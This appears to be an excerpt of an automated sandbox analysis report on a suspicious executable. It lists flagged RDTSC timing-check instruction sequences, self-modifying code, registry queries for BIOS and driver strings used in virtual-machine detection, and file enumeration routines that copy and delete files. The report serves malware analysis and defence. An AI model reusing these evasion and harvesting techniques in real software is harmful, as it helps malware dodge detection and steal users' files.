Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D40A second address: 99D430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jne 00007FE52CC95236h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jg 00007FE52CC9525Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D430 second address: 99D434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D434 second address: 99D438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D438 second address: 99D442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99D442 second address: 99D446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A20F0 second address: 9A210B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A210B second address: 9A212D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FE52CC95236h 0x0000000d jno 00007FE52CC95236h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jo 00007FE52CC95248h 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A212D second address: 9A2131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4EF6 second address: 9A4F12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95248h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4F12 second address: 9A4F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE23h 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FE52CBFFE16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4F33 second address: 9A4F4F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FE52CC9523Ah 0x00000013 pop edi 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4F4F second address: 9A4F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A4B0F second address: 9A4B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4C0E second address: 9B4C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE1Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FE52CBFFE21h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4C37 second address: 9B4C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AF61F second address: 9AF630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AF630 second address: 9AF634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C1481 second address: 9C1486 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0F40 second address: 9C0F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0F48 second address: 9C0F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0F55 second address: 9C0F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FE52CC9523Bh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C10E9 second address: 9C10ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7D18 second address: 9D7D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6EA9 second address: 9D6EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6EAE second address: 9D6EB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6FF5 second address: 9D6FFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6FFF second address: 9D7003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7003 second address: 9D7007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7007 second address: 9D7019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FE52CC95236h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7019 second address: 9D703D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE29h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D75A0 second address: 9D75A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7715 second address: 9D771B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7887 second address: 9D788D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D788D second address: 9D78AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE52CBFFE26h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8A6CF4 second address: 8A6CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D79EB second address: 9D7A03 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE52CBFFE22h 0x00000008 je 00007FE52CBFFE16h 0x0000000e jnp 00007FE52CBFFE16h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7A03 second address: 9D7A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D93C9 second address: 9D93CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D93CD second address: 9D93FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE52CC95236h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FE52CC9524Bh 0x00000012 pop edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBCEF second address: 9DBD10 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE52CBFFE26h 0x00000008 jmp 00007FE52CBFFE20h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBD10 second address: 9DBD14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBD14 second address: 9DBD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBF82 second address: 9DBF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FE52CC95236h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBF93 second address: 9DBF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBF97 second address: 9DBF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DBF9D second address: 9DBFA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FE52CBFFE16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC274 second address: 9DC279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC279 second address: 9DC2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FE52CBFFE18h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movzx edx, bx 0x00000027 jmp 00007FE52CBFFE20h 0x0000002c push dword ptr [ebp+122D2702h] 0x00000032 mov edx, dword ptr [ebp+122D2F18h] 0x00000038 push 9B0B5D0Eh 0x0000003d pushad 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DC2CF second address: 9DC2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DDB4B second address: 9DDB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DDB51 second address: 9DDB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FE52CC95236h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDB61 second address: 9DDB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE28h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDB81 second address: 9DDB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE52CC95236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF714 second address: 9DF720 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007FE52CBFFE16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF720 second address: 9DF738 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE52CC95240h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502AA second address: 50502AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502AE second address: 50502B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502B4 second address: 5050300 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 jmp 00007FE52CBFFE21h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE52CBFFE1Ch 0x00000015 sub cx, E468h 0x0000001a jmp 00007FE52CBFFE1Bh 0x0000001f popfd 0x00000020 push ecx 0x00000021 mov dl, 31h 0x00000023 pop eax 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 pushad 0x00000029 mov bh, 07h 0x0000002b mov cl, 5Bh 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov si, dx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050300 second address: 5050318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 movsx edx, cx 0x0000000c call 00007FE52CC9523Ah 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050373 second address: 5050379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 73FCA4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 73FD6C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 97C77D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision graph_0-26889
              Source: C:\Users\user\Desktop\file.exe | API coverage: 4.7 %
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005018A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 0_2_005018A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00503910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_00503910
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00501250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_00501250
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00501269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_00501269
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 0_2_0050E210
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00504B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_00504B10
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00504B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 0_2_00504B29
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 0_2_0050CBE0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00502390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA, 0_2_00502390
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_004FDB80
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_004FDB99
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005023A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 0_2_005023A9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose, 0_2_0050D530
